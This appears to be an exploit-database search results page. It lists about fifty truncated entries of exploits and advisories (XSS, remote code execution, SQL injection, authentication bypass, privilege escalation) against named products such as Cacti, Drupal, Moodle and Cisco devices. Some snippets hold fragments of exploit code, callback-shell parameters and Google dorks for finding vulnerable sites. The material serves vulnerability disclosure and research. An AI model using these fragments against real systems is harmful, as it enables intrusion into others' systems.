41207 matches found
IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting
IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting Date: 2020-01-27 Author: Lutfu Mert Ceylan Vendor Homepage: www.icewarp.com Tested on: Windows 10 Versions: 11.4.4.1 and before Vulnerable Parameter: "color" Get Method...
Cacti 1.2.8 - Unauthenticated Remote Code Execution
Cacti 1.2.8 - Unauthenticated Remote Code Execution !/usr/bin/python3 Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution Date: 03/02/2020 Exploit Author: Askar @mohammadaskar2 CVE: CVE-2020-8813 Vendor Homepage: https://cacti.net/ Version: v1.2.8 Tested on: CentOS 7.3 / PHP 7.1.33...
ThinVNC 1.0b1 - Authentication Bypass
ThinVNC 1.0b1 - Authentication Bypass Exploit Title: ThinVNC 1.0b1 - Authentication Bypass Date: 2019-10-17 Exploit Author: Nikhith Tumamlapalli Contributor WarMarX Vendor Homepage: https://sourceforge.net/projects/thinvnc/ Software Link:...
Microsoft DirectWrite AFDKO - Use of Uninitialized Memory While Freeing Resources in var_loadavar
Microsoft DirectWrite AFDKO - Use of Uninitialized Memory While Freeing Resources in varloadavar -----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library...
Cisco Adaptive Security Appliance - Path Traversal
Cisco Adaptive Security Appliance - Path Traversal ''' Cisco Adaptive Security Appliance - Path Traversal CVE-2018-0296 A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques. Vulnerabl...
RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation
RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation Title: RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation Date: 2017-12-11 Author: LiquidWorm Vendor: Rockwell Automation, Inc. Product web page: https://www.rockwellautomation.com Affected version: Rockwell...
Rockwell Scada System 27.011 - Cross-Site Scripting
Rockwell Scada System 27.011 - Cross-Site Scripting Exploit Title: Rockwell Scada System - Cross-Site Scripting Date: 2018-05-16 Exploit Author: t4rkd3vilz Vendor Homepage: https://rockwellautomation.com/ Software Link:...
Lutron Quantum 2.0 - 3.2.243 - Information Disclosure
Lutron Quantum 2.0 - 3.2.243 - Information Disclosure ''' Exploit Title: Login bypass and data leak - Lutron Quantum 2.0 - 3.2.243 firmware Date: 20-03-2018 Exploit Author: David Castro Contact: https://twitter.com/SadFud75 Vendor Homepage: http://www.lutron.com Software Link:...
Advantech WebAccess 8.3 - Directory Traversal Remote Code Execution
Advantech WebAccess 8.3 - Directory Traversal Remote Code Execution !/usr/bin/python2.7 Exploit Title: Advantech WebAccess 8.3 webvrpcs Directory Traversal RCE Vulnerability Date: 03-11-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.advantech.com Software Link:...
NETGEAR Routers - Password Disclosure
NETGEAR Routers - Password Disclosure Trustwave SpiderLabs Security Advisory TWSL2017-003: Multiple Vulnerabilities in NETGEAR Routers Published: 01/30/2017 Version: 1.0 Vendor: NETGEAR http://www.netgear.com/ Product: Multiple products Finding 1: Remote and Local Password Disclosure Credit: Simo...
McAfee Virus Scan Enterprise for Linux 1.9.2 2.0.2 - Remote Code Execution
McAfee Virus Scan Enterprise for Linux 1.9.2 2.0.2 - Remote Code Execution ''' Source: https://nation.state.actor/mcafee.html Vulnerabilities CVE-2016-8016: Remote Unauthenticated File Existence Test CVE-2016-8017: Remote Unauthenticated File Read with Constraints CVE-2016-8018: No Cross-Site...
Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited
Linux Kernel x86 - Disable ASLR by Setting the RLIMITSTACK Resource to Unlimited Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html CVE-2016-3672 - Unlimiting the stack not longer disables ASLR Authors: Hector Marco & Ismael Ripoll CVE: CVE-2016-3672...
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service !/usr/bin/perl miniupnpd/1.0 remote denial of service exploit Copyright 2015 c Todor Donev [email protected] http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg The SSDP protocol can discover Plug & Play devices, with...
CuteNews 2.0.3 - Arbitrary File Upload
CuteNews 2.0.3 - Arbitrary File Upload CuteNews 2.0.3 Remote File Upload Vulnerability ================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //...
Nginx 1.3.9 1.4.0 - Denial of Service (PoC)
Nginx 1.3.9 1.4.0 - Denial of Service PoC Exploit Title: nginx v1.3.9-1.4.0 DOS POC CVE-2013-2028 Google Dork: CVE-2013-2028 Date: 16.05.2013 Exploit Author: Mert SARICA - mert . sarica @ gmail . com - http://www.mertsarica.com Vendor Homepage: http://nginx.org/ Software Link:...
Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)
Microsoft Office - HtmlDlgHelper Class Memory Corruption MS10-071 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com Microsoft Office HtmlDlgHelper class memory corruption 1. Advisory Information Title: Microsoft Office HtmlDlgHelper class memory corruption Advisory I...
IBM AIX 5.66.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug
IBM AIX 5.66.1 - LIBINITDBG Arbitrary File Overwrite via Libc Debug !/bin/sh $Id: raptorlibC,v 1.1 2009/09/10 15:08:04 raptor Exp $ raptorlibC - AIX arbitrary file overwrite via libC debug Copyright c 2009 Marco Ivaldi Property of @ Mediaservice.net Srl Data Security Division...
Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)
Linksys WRT54G Firmware 1.00.9 - Security Bypass 1 regurgitated by: meathive url: kinqpinz.info ; Tue, 05 Feb 2008 07:51:41 -0700 CVE-2008-1247 WRT54G firmware version: v1.00.9 Default LAN IP: 192.168.1.1 Default auth: user:blank - pass:admin Authorization: Basic OmFkbWlu php print...
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass !/bin/sh NTLM && BASIC AUTH BYPASS : sha0atbadchecksum.net Based on my adv: https://www.securityfocus.com/bid/24105/info CVE-2007-2815 if $ != 2 then printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";...
Squirrelcart 2.2.0 - cart_content.php Remote File Inclusion
Squirrelcart 2.2.0 - cartcontent.php Remote File Inclusion Title : Squirrelcart = 2.2.0 Remote File Inclusion URL : http://www.ldev.com/ google Dork : inurl:/squirrelcart/ Author : OLiBekaS greetz : Skulmatic, weleh, brokencode, bigmaster and all papmahackerlink crew Exploit :...
ACal 2.2.6 - day.php Remote File Inclusion
ACal 2.2.6 - day.php Remote File Inclusion $$ $ Title: ACal 2.2.6 = Remote File Inclusion $ $$ $ URL: http://acalproj.sourceforge.net/ $ $$ $ Dork: intitle:"Login to Calendar" $ $$ $ Credits: PiNGuX $ $$ $ Greetz : 0o $ $$ Exploit:...
Invision Power Board 2.1.5 - lastdate Remote Code Execution
Invision Power Board 2.1.5 - lastdate Remote Code Execution !/usr/bin/perl Invision Power Board 2. commands execution exploit by RST/GHC vulnerable versions new Proto = "tcp", PeerAddr = "$host", PeerPort = "80" || die "- CONNECTION FAILED"; $login = s/./"%".ucsprintf"%2.2x",ord$1/eg; $password =...
phpLinks 2.1.2 - Multiple Vulnerabilities
phpLinks 2.1.2 - Multiple Vulnerabilities phpLinks Multiple Vulnerabilities Vendor: destiney.com Product: phpLinks Version: = 2.1.2 Website: http://phplinks.sourceforge.net/ BID: 6632 6633 Description: phpLinks is an open source free PHP script. phpLinks allows you to run a very powerful link far...
Cisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection
Cisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection !/usr/bin/python """ Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability Tested on: Cisco DCNM 11.2.1 Installer for Windows 64-bit - Release: 11.21 - Release Date:...
Centreon 19.10.5 - Pollers Remote Command Execution
Centreon 19.10.5 - Pollers Remote Command Execution Exploit Title: Centreon 19.10.5 - 'Pollers' Remote Command Execution Date: 2020-01-27 Exploit Author: Omri Baso, Fabien Aunay Vendor Homepage: https://www.centreon.com/ Software Link: https://github.com/centreon/centreon Version: 19.10.5 Tested...
Studio 5000 Logix Designer 30.01.00 - FactoryTalk Activation Service Unquoted Service Path
Studio 5000 Logix Designer 30.01.00 - FactoryTalk Activation Service Unquoted Service Path Exploit Title: Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path Discovery by: Luis Martinez Discovery Date: 2019-11-18 Vendor Homepage:...
Optergy 2.3.0a - Remote Code Execution (Backdoor)
Optergy 2.3.0a - Remote Code Execution Backdoor Title: Optergy 2.3.0a - Remote Code Execution Author: LiquidWorm Date: 2019-11-05 Vendor: https://optergy.com/ Product web page: https://optergy.com/products/ Affected version: \n' sys.exit while True: challengeurl =...
Spring Security OAuth - Open Redirector
Spring Security OAuth - Open Redirector Exploit Title: Open Redirector in spring-security-oauth2 Date: 17 June 2019 Exploit Author: Riemann Vendor Homepage: https://spring.io/projects/spring-security-oauth Software Link: https://spring.io Version: Spring Security OAuth versions 2.3 prior to 2.3.6...
PHPads 2.0 - click.php3?bannerID SQL Injection
PHPads 2.0 - click.php3?bannerID SQL Injection + Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores + Date: 05/05/2019 + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: https://blondish.net/ + Software Demo :...
Microsoft Windows 72008 - Win32k Denial of Service (PoC)
Microsoft Windows 72008 - Win32k Denial of Service PoC Exploit Title: Microsoft Windows Win32k CVE-2019-0808 Local Privilege Escalation Vulnerability Date: 24/03/2019 Exploit Author: ze0r Vendor Homepage: www.microsoft.com Version: Microsoft Windows 7/ Server 2008 CVE : CVE-2019-0808...
Moodle 3.4.1 - Remote Code Execution
Moodle 3.4.1 - Remote Code Execution php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure...
Microsoft Windows 10 - COM Desktop Broker Privilege Escalation
Microsoft Windows 10 - COM Desktop Broker Privilege Escalation Windows: COM Desktop Broker Elevation of Privilege Platform: Windows 10 1809 almost certainly earlier versions as well. Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: AppContainer Sandbox Summar...
Modx Revolution 2.6.4 - Remote Code Execution
Modx Revolution 2.6.4 - Remote Code Execution Exploit Title: Modx Revolution ' if requests.get target + '/connectors/system/phpthumb.php', verify=verify.statuscode != 404: printFore.GREEN + '/connectors/system/phpthumb.php - found' url = target + '/connectors/system/phpthumb.php' payload = 'ctx':...
NUUO NVRmini2 NVRsolo Crystal Devices NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities
NUUO NVRmini2 NVRsolo Crystal Devices NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities Multiple vulnerabilities in NUUO NVRmini2 / NVRsolo / Crystal devices and NETGEAR ReadyNAS Surveillance application Discovered by Pedro Ribeiro [email protected], Agile Information Security...
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation MS14-070 """ KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-001 Publication Date:...
FreeBSD - Multiple Vulnerabilities
FreeBSD - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ FreeBSD Kernel Multiple Vulnerabilities 1. Advisory Information Title: FreeBSD Kernel Multiple Vulnerabilities Advisory ID: CORE-2015-0003 Advisory URL:...
Drupal 7.0 7.31 - Drupalgeddon SQL Injection (Add Admin User)
Drupal 7.0 7.31 - Drupalgeddon SQL Injection Add Admin User !/usr/bin/python Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 Inspired by yukyuk's P.o.C https://www.reddit.com/user/fyukyuk Tested on Drupal 7.31 with BackBox 3.x This material is intended for...
Ammyy Admin 3.2 - Authentication Bypass
Ammyy Admin 3.2 - Authentication Bypass Title: ==== Ammyy Admin - Hidden hard-coded option and Access Control vulnerability. Credit: ====== Name: Bhadresh Patel Company/affiliation: Cyberoam Technologies Private Limited Website: www.cyberoam.com CVE: ==== - CVE-2013-5581 for hidden hard-coded...
TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities
TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com TP-Link IP Cameras Multiple Vulnerabilities 1. Advisory Information Title: TP-Link IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0318 Advisory URL:...
MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities
MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ MayGion IP Cameras multiple vulnerabilities 1. Advisory Information Title: MayGion IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0322 Advisory URL:...
Cisco Linksys E4200 - Multiple Vulnerabilities
Cisco Linksys E4200 - Multiple Vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ============================================= XSS, LFI in Cisco, Linksys E4200 Firmware ============================================= URL:...
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeJASMafletMafBrowserClose.mafService?jdemafjasLinkTarget Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeJASMafletMafBrowserClose.mafService?jdemafjasLinkTarget Cross-Site Scripting source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker...
phpMyBitTorrent 2.0.4 - SQL Injection
phpMyBitTorrent 2.0.4 - SQL Injection Exploit Title: phpMyBitTorrent 2.0.4 SQL injection Google Dork: inurl:"user.php?op=register" Date: 14/FEB/2011 Author: [email protected] Software Link: http://sourceforge.net/projects/phpmybittorrent/ Version: 2.0.4 Tested on: nix...
VMware Tools - Update OS Command Injection
VMware Tools - Update OS Command Injection VMware Tools update OS Command Injection ======================================== 1. Advisory Information Advisory ID: BONSAI-2010-0110 Date published: Thu Dec 9, 2010 Vendors contacted: VMware Release mode: Coordinated release 2. Vulnerability Informati...
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite // source: https://www.securityfocus.com/bid/44242/info / CVE-2010-2963 Arbitrary write memory write via v4l1 compat ioctl. Kees Cook greets to drosenberg, spender, taviso / define GNUSOURCE include include include include includ...
WeBProdZ CMS - SQL Injection
WeBProdZ CMS - SQL Injection | \ | | | | | |/ / | | | | | // \ \ / / | | | | | | |/ | ' \ | |\ \ /\ V / | | || | || | | | | | | \| / /||,|||/|| || | | | || | | | | |/' || || | | |/ / | ' \ | /| |\ | | | / | | | | | | | \ |/ /./ / /|,|| || || / / $ Exploit Title : WeBProdZ CMS SQL...
0DayDB 2.3 - id Remote Authentication Bypass
0DayDB 2.3 - id Remote Authentication Bypass !/usr/bin/perl Autor : Pr0metheuS Script : 0DayDB v2.3 Version : v2.3 Dork : "Powered By 0DayDB v2.3" Gr33tz-Team.org use LWP::UserAgent; if@ARGV!=3 print "\n"; print "0DayDB v2.3 Remote Admin Bypass\n"; print "perl $0 \n"; print "downloads ID for...
bwired - index.php?newsID SQL Injection
bwired - index.php?newsID SQL Injection / \ / \ | | | | | | | | | | | / | | | | | | | ' / | | ' \ / \ | | | | || | || | | | \ | | | | / | , |/ /|| ||| |||| / | |/ Program Title bwired - Remote SQL Injection Note There is also XSS, PHPSESSID session fixation, and cookie manipulation which I...
Invision Power Board 2.1.4 - Register Users Denial of Service
Invision Power Board 2.1.4 - Register Users Denial of Service !/usr/bin/perl use IO::Socket; | | | \ | | |/ IPB Register Multiple Users Denial of Service Doesn't Work on forums using "Code Confirmation" Created By SkOd SED security Team http://www.sed-team.be [email protected] ISRAEL print q...
Gemitel 3.50 - affich.php Remote File Inclusion Command Injection
Gemitel 3.50 - affich.php Remote File Inclusion Command Injection source: https://www.securityfocus.com/bid/10156/info A vulnerability has been identified in the handling of input by Gemitel. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the...